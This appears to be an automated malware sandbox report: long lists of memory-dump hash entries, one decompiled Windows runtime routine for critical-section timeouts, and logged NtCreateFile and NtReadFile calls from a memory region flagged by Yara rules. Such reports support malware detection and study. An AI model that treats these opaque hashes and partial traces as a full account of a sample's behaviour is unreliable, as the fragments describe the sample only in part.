                                                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                  • Instruction ID: 3c440f9eeb1f660c5725adba057a8593f6f9cc1840febbe1b1d00491d6c4324b
                                                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                  • Instruction Fuzzy Hash: DF0144327406809BC3229B6DC904F697BD8EF82364F0900A2FA119B2B3D739EC00E324
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d99ab0b6e6a1abe96d63d3a22c17f479ceff0c43f39451ccdedd8a4beea0cff9
                                                                                  • Instruction ID: d11d4b0798719066297c2e5bdc84e989e42152baf79c72b00d42eafc5880de55
                                                                                  • Opcode Fuzzy Hash: d99ab0b6e6a1abe96d63d3a22c17f479ceff0c43f39451ccdedd8a4beea0cff9
                                                                                  • Instruction Fuzzy Hash: 06016270E0024DAFCB14DFA8D542A6EB7F4FF04310F104169B515EB392D635D901DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 914c9f25c0e4430e3ac0481f74215a497b3e94db3435a2561843f08aa6fdc753
                                                                                  • Instruction ID: 1bffd744b95c823dee45169b6cdd2879ff9b70d1f8686cfe39d9aed5ce948b96
                                                                                  • Opcode Fuzzy Hash: 914c9f25c0e4430e3ac0481f74215a497b3e94db3435a2561843f08aa6fdc753
                                                                                  • Instruction Fuzzy Hash: 6B011D74A0024DAFDB00DFB9D546AAEBBF4EF08300F50805AB905EB381DA349A00DB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2e7e3b03865ffef42e0768ccfc4fd2f318b7061970f591f32db1a7e805c70796
                                                                                  • Instruction ID: 9d69196f78e43ea6da07793cd4c345956ccbab6626fede4ad18a531cdcd55f2f
                                                                                  • Opcode Fuzzy Hash: 2e7e3b03865ffef42e0768ccfc4fd2f318b7061970f591f32db1a7e805c70796
                                                                                  • Instruction Fuzzy Hash: 9E013171E0124CAFDB04DFA9D546AAEB7F4FF08700F504059B845EB351E6349A00DB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9ac37bacdb339fc787962e3764c1d031b4f3a016158e8960311d7c353349aa4b
                                                                                  • Instruction ID: b5e183b7b010436a077382fd5ca49d854d4d0269903ac3c744e69bae7c05a162
                                                                                  • Opcode Fuzzy Hash: 9ac37bacdb339fc787962e3764c1d031b4f3a016158e8960311d7c353349aa4b
                                                                                  • Instruction Fuzzy Hash: E2F04F71E0424CAFDB04DFA9D506E6EB7F4BF04300F444069B905EB291E6359900DB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c895899d88176b0e407ea2567b3fe9d76b3bbd5f9f24997c016bae8bad260974
                                                                                  • Instruction ID: 9e6d576f397d64b23f9368063996629fe45fe852f331b36d8fd0f301712857da
                                                                                  • Opcode Fuzzy Hash: c895899d88176b0e407ea2567b3fe9d76b3bbd5f9f24997c016bae8bad260974
                                                                                  • Instruction Fuzzy Hash: 7FF024B29112908FD731C314C314F617BD89B08378F74A46FE60DA3145C7A6FC82C241
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2aac67f2b7458fdc07c070b0ad6b13bcedfc5bd241f0fa129b9a5df6b18c31c3
                                                                                  • Instruction ID: cded26b8800c6dfc8e0322e630066a287b2511aaeac79703e66391737c696059
                                                                                  • Opcode Fuzzy Hash: 2aac67f2b7458fdc07c070b0ad6b13bcedfc5bd241f0fa129b9a5df6b18c31c3
                                                                                  • Instruction Fuzzy Hash: 33F0EC27C159C85ADF726B7879123D13BD0DB5A3A1F1D0486E95057206CD398C87FB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9e94b6d64f7e4df1a1b5b7add0e3cb1e8dea422922ad2596eb29dad6f5f89236
                                                                                  • Instruction ID: 4dade56725809ebfe0efa546c97fd1c0d953a424b77f035b074faea0677c97eb
                                                                                  • Opcode Fuzzy Hash: 9e94b6d64f7e4df1a1b5b7add0e3cb1e8dea422922ad2596eb29dad6f5f89236
                                                                                  • Instruction Fuzzy Hash: 2DF09070E4464CAFDB14EBB9D546B6E77F4AF08300F50809AF906AB291DA34D9019B55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                  • Instruction ID: 44c1630b3a58ff664622b514461fd3cacbee007519788ce9ad28f3c108a09f96
                                                                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                  • Instruction Fuzzy Hash: 07E0E5722405406BDB219E06DC81F0336E99F86720F004078B5042E293C6E6DC0987A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eae7be4c64fc2bcbc356244e6ee7ef6efcd443a7b28ee5546336e0a728a048bb
                                                                                  • Instruction ID: c469378832540cc005ffdca32ad2323cc8d3c29491b5707330a65acfd561908f
                                                                                  • Opcode Fuzzy Hash: eae7be4c64fc2bcbc356244e6ee7ef6efcd443a7b28ee5546336e0a728a048bb
                                                                                  • Instruction Fuzzy Hash: D7F0E270A0424DABCB00DBB9E94AE6E77F4EF08300F20019AF806EB2C1EA34DD00D755
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8b27e4362756bb71916b028985b6988de325ee4a56e91de5a5272ddc5090463d
                                                                                  • Instruction ID: b786fce00d9936ab8a35b61fd9f654e18454b55060529068a412fd6b30866260
                                                                                  • Opcode Fuzzy Hash: 8b27e4362756bb71916b028985b6988de325ee4a56e91de5a5272ddc5090463d
                                                                                  • Instruction Fuzzy Hash: 98F0B434908244AADF199768CA40FBA7BA2BF04314F14211DE4E1B7191E7269C02DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: da482381c9c681fc3034443f29e6106e3a3586bd013f0a43b4f64d7be09bbd29
                                                                                  • Instruction ID: 0afa632ba20b5170b509a3d9b4970f70ea3cc91d4603e3f087f919094e452e35
                                                                                  • Opcode Fuzzy Hash: da482381c9c681fc3034443f29e6106e3a3586bd013f0a43b4f64d7be09bbd29
                                                                                  • Instruction Fuzzy Hash: 1A90027134500802D24171594805616440EA7D0381F92D062A1415554E86958A56FAA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39d5c8bce314fd6f5111a03be26bf207a4c0363b6ddc2eb3fe71ef86841d0a55
                                                                                  • Instruction ID: c91de85336cabc2aa5e98cb25159ece8c00723d86fc770a431ac573242011a0b
                                                                                  • Opcode Fuzzy Hash: 39d5c8bce314fd6f5111a03be26bf207a4c0363b6ddc2eb3fe71ef86841d0a55
                                                                                  • Instruction Fuzzy Hash: B790027130500C02D20461594C05696440A97D0341F52D061A7015655E96A58891B171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a9036c4c3c10e5a559fdcc009704f619de1a5e81c726b884835fa47d6fb8bad
                                                                                  • Instruction ID: bdaf5b2d1283eaae2a6bd99c07c617831c74504a529abfad9687df302bc5e92c
                                                                                  • Opcode Fuzzy Hash: 1a9036c4c3c10e5a559fdcc009704f619de1a5e81c726b884835fa47d6fb8bad
                                                                                  • Instruction Fuzzy Hash: B09002A131500442D20461594805716444A97E1341F52D062A3145554CC5698C61B165
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 04f0530eb8a661488d01f4f6e0db64d2c75a2385448d7174999600642a2411ab
                                                                                  • Instruction ID: cc53f1fee06a750576bd753e6f358f5354dd5d7ff65cc39f9b1518ece4ad36f4
                                                                                  • Opcode Fuzzy Hash: 04f0530eb8a661488d01f4f6e0db64d2c75a2385448d7174999600642a2411ab
                                                                                  • Instruction Fuzzy Hash: 72900265325004020245A5590A0551B484AA7D6391392D065F2407590CC6618865B361
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b89735fa9487de015fcf80aefe793a03efb0a00854bea8aa1c8c10659d8bc443
                                                                                  • Instruction ID: 001b9f3cb8ffca899a3cd9644b3ee981de36e4d86e0186cd9a7322c0257b52af
                                                                                  • Opcode Fuzzy Hash: b89735fa9487de015fcf80aefe793a03efb0a00854bea8aa1c8c10659d8bc443
                                                                                  • Instruction Fuzzy Hash: B99002A130540803D24065594C05617440A97D0342F52D061A3055555E8A698C51B175
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8a9e632dc593e35db3c90e6067cfa369f0a197cbf338d193cd30ea1694f21fe
                                                                                  • Instruction ID: 703b8f97cac7d71f5eaa78ab15279958e76e45027e47a778b18418eca4f09f83
                                                                                  • Opcode Fuzzy Hash: e8a9e632dc593e35db3c90e6067cfa369f0a197cbf338d193cd30ea1694f21fe
                                                                                  • Instruction Fuzzy Hash: 4D9002E1305144924600A2598805B1A890A97E0341B52D066E2045560CC5658851F175
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9ff1b11cbe5c21a8d5d7ee967d5da98e55de8562caed47fc6718bd2342c48a8e
                                                                                  • Instruction ID: 124799ee8bd124a02232325cb3aa395d91c80eb5a7dcad75f9d78bff42bc3cda
                                                                                  • Opcode Fuzzy Hash: 9ff1b11cbe5c21a8d5d7ee967d5da98e55de8562caed47fc6718bd2342c48a8e
                                                                                  • Instruction Fuzzy Hash: 2E900271B0900412924071594C15656840BA7E0781B56D061A1505554C89948A55B3E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d437098582afd2aad35c644491da3b5715d3f3d2e404adab01cb72a5cf83973
                                                                                  • Instruction ID: bb9deceb36e215a30da535e651683e74936268668762df586393146007d84caf
                                                                                  • Opcode Fuzzy Hash: 1d437098582afd2aad35c644491da3b5715d3f3d2e404adab01cb72a5cf83973
                                                                                  • Instruction Fuzzy Hash: B490027130500C42D20061594805B56440A97E0341F52D066A1115654D8655C851B561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b12c1b585a0d92096d9735b21d1bcf2367b67c4cd18dbbdde308ca1a279b10af
                                                                                  • Instruction ID: 3fd8cd2edccde5b7aef1c03fc86c98c03d2adec86fafb807da1684faeed2dccd
                                                                                  • Opcode Fuzzy Hash: b12c1b585a0d92096d9735b21d1bcf2367b67c4cd18dbbdde308ca1a279b10af
                                                                                  • Instruction Fuzzy Hash: 0890026130544842D24062594C05B1F850A97E1342F92D069A5147554CC9558855B761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a90a7636abd4b28c81ec81fc4cd63d0de97e040c94bd34ad5693d9193f13d7c
                                                                                  • Instruction ID: 5d39e7fd095f4e3d77d136ba60effa7d78e129dff409a35059b2062ea43352aa
                                                                                  • Opcode Fuzzy Hash: 3a90a7636abd4b28c81ec81fc4cd63d0de97e040c94bd34ad5693d9193f13d7c
                                                                                  • Instruction Fuzzy Hash: D390027130904C42D24071594805A56441A97D0345F52D061A1055694D96658D55F6A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0cc1904052252c14541b58172d09a3405e2b9d6336c0d515711fdc9e16e1c53b
                                                                                  • Instruction ID: 356093383d9453a299e5b3ee4fb260cd28d3e3f6a240bb6078cdacc1579c03c8
                                                                                  • Opcode Fuzzy Hash: 0cc1904052252c14541b58172d09a3405e2b9d6336c0d515711fdc9e16e1c53b
                                                                                  • Instruction Fuzzy Hash: 6B90027170900C02D25071594815756440A97D0341F52D061A1015654D87958A55B6E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 120b19df404d7b7986c13f2a3406abb8f3a3c68c24fe34a66b416565a16acd9b
                                                                                  • Instruction ID: d80012decbc8552d5faa202e84808c60d25862f556f7be553c60984a47c8fea1
                                                                                  • Opcode Fuzzy Hash: 120b19df404d7b7986c13f2a3406abb8f3a3c68c24fe34a66b416565a16acd9b
                                                                                  • Instruction Fuzzy Hash: C590027130540802D20061594C09757440A97D0342F52D061A6155555E86A5C891B571
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3f7bd223d8d20c1c79f33680aac14db3ffd818d3ccac4e9c33815cfe1231f54f
                                                                                  • Instruction ID: be35c37a44d9171f2077e5188c039cf9fee056f3deae6a9bb7b3eeeb600ad31a
                                                                                  • Opcode Fuzzy Hash: 3f7bd223d8d20c1c79f33680aac14db3ffd818d3ccac4e9c33815cfe1231f54f
                                                                                  • Instruction Fuzzy Hash: D390027130544402D2407159884561B940AA7E0341F52D461E1416554C86558856F261
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 735ce94f514dd4cc416cd7fd20f5bb9609f4b18f7ff0a5f76d5c988fb06e07fe
                                                                                  • Instruction ID: b47c7a5e8f1f96c66152ccfe574fcec3b39809f09365696962e0d27fda051ab6
                                                                                  • Opcode Fuzzy Hash: 735ce94f514dd4cc416cd7fd20f5bb9609f4b18f7ff0a5f76d5c988fb06e07fe
                                                                                  • Instruction Fuzzy Hash: B290027130500803D20061595909717440A97D0341F52E461A1415558DD6968851B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f1cce53d15440b2ecdac410ac2095b02f0d1c3aa25545511b52f4b9e6f4f0b47
                                                                                  • Instruction ID: e307d3c45dd885438b3aa051e8c18390ff30a4bd1a6cd551d5dbfc39e1d35c05
                                                                                  • Opcode Fuzzy Hash: f1cce53d15440b2ecdac410ac2095b02f0d1c3aa25545511b52f4b9e6f4f0b47
                                                                                  • Instruction Fuzzy Hash: 3A90026130904842D20065595809A16440A97D0345F52E061A2055595DC6758851F171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9810b9498a56728cbae5c90b10a651d2ead56d627ac44cf514787832cd57095
                                                                                  • Instruction ID: e7bf2dfcd025d40df863c93323e6431ce5a34077c12b04fe1d534f41a369a644
                                                                                  • Opcode Fuzzy Hash: c9810b9498a56728cbae5c90b10a651d2ead56d627ac44cf514787832cd57095
                                                                                  • Instruction Fuzzy Hash: 4090027530904842D60065595C05A97440A97D0345F52E461A141559CD86948861F161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a63c348a586308b50ae1d21ac0d53739005a5a0733a80fd47378948dd85247ce
                                                                                  • Instruction ID: 801908b8fc162d5e6f5d8a1bd44a1d28ee44865676d0911f4edcec72dae07943
                                                                                  • Opcode Fuzzy Hash: a63c348a586308b50ae1d21ac0d53739005a5a0733a80fd47378948dd85247ce
                                                                                  • Instruction Fuzzy Hash: 3390026170900802D24071595819716441A97D0341F52E061A1015554DC6998A55B6E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebcedf33cfe606d3f1549830be3fbd89be173951bfab8baa6ff2b6bb54928e99
                                                                                  • Instruction ID: a9e4940cad61f7959708b1c3f098e857f5f82e5d8f2b0548b60f83a67a585390
                                                                                  • Opcode Fuzzy Hash: ebcedf33cfe606d3f1549830be3fbd89be173951bfab8baa6ff2b6bb54928e99
                                                                                  • Instruction Fuzzy Hash: DC90026134500C02D24071598815717440BD7D0741F52D061A1015554D86568965B6F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8302c6ac5af13b6a12da4e09601ccb0540beb939b44406facd29ab4f1c333793
                                                                                  • Instruction ID: d8e8d31baeee1d537d7b4204bca279f510131fa52cf08176ed9f8e53c842bf12
                                                                                  • Opcode Fuzzy Hash: 8302c6ac5af13b6a12da4e09601ccb0540beb939b44406facd29ab4f1c333793
                                                                                  • Instruction Fuzzy Hash: EA900271305004529600A6995C05A5A850A97F0341B52E065A5005554C85948861B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: a6ad683348ce2ef9660277085b7ccd5fd0b8a3e2327d26ea8aa990910f812478
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 53%
                                                                                  			E00F3FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                  				void* _t7;
                                                                                  				intOrPtr _t9;
                                                                                  				intOrPtr _t10;
                                                                                  				intOrPtr* _t12;
                                                                                  				intOrPtr* _t13;
                                                                                  				intOrPtr _t14;
                                                                                  				intOrPtr* _t15;
                                                                                  
                                                                                  				_t13 = __edx;
                                                                                  				_push(_a4);
                                                                                  				_t14 =  *[fs:0x18];
                                                                                  				_t15 = _t12;
                                                                                  				_t7 = E00EECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                  				_push(_t13);
                                                                                  				E00F35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                  				_t9 =  *_t15;
                                                                                  				if(_t9 == 0xffffffff) {
                                                                                  					_t10 = 0;
                                                                                  				} else {
                                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                  				}
                                                                                  				_push(_t10);
                                                                                  				_push(_t15);
                                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                  				return E00F35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                  			}











                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3FDFA
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00F3FE01
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00F3FE2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                  • API String ID: 885266447-3903918235
                                                                                  • Opcode ID: 9dc3e8b0865734ff9475917b8f3f89a980cc43686f6631ea759f26d95ed940b6
                                                                                  • Instruction ID: c1c0e750c65e658e2d92dd3e107d4e602e1539cdd865b0cc2ac6531a6debf30d
                                                                                  • Opcode Fuzzy Hash: 9dc3e8b0865734ff9475917b8f3f89a980cc43686f6631ea759f26d95ed940b6
                                                                                  • Instruction Fuzzy Hash: A0F0F672640601BFDA201A45DC02F33BB5AEB84B30F240314F628561E1EA62F860A6F0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,030E3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030E3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030E820D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: .z`
                                                                                  • API String ID: 823142352-1441809116
                                                                                  • Opcode ID: 02f0f0096c8857b2c8892c27d9d29dd639d514dd43c5746a9fa5ff6305b6ad20
                                                                                  • Instruction ID: 80a59374a1691d890cd00e2442973494198ea60a33ffdd4ab853e40f94c5a66d
                                                                                  • Opcode Fuzzy Hash: 02f0f0096c8857b2c8892c27d9d29dd639d514dd43c5746a9fa5ff6305b6ad20
                                                                                  • Instruction Fuzzy Hash: 3201AFB2245108AFDB08CF98DC94EEB77A9AF9C654F158248BA0D97241D630E815CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,030E3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,030E3B97,007A002E,00000000,00000060,00000000,00000000), ref: 030E820D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: .z`
                                                                                  • API String ID: 823142352-1441809116
                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                  • Instruction ID: acd94620ae8eb2acedf240f64f40579255ec966465210fef2de737355c4d83ac
                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                  • Instruction Fuzzy Hash: B0F0B2B2205208AFCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(030E3D52,5E972F59,FFFFFFFF,030E3A11,?,?,030E3D52,?,030E3A11,FFFFFFFF,5E972F59,030E3D52,?,00000000), ref: 030E82B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
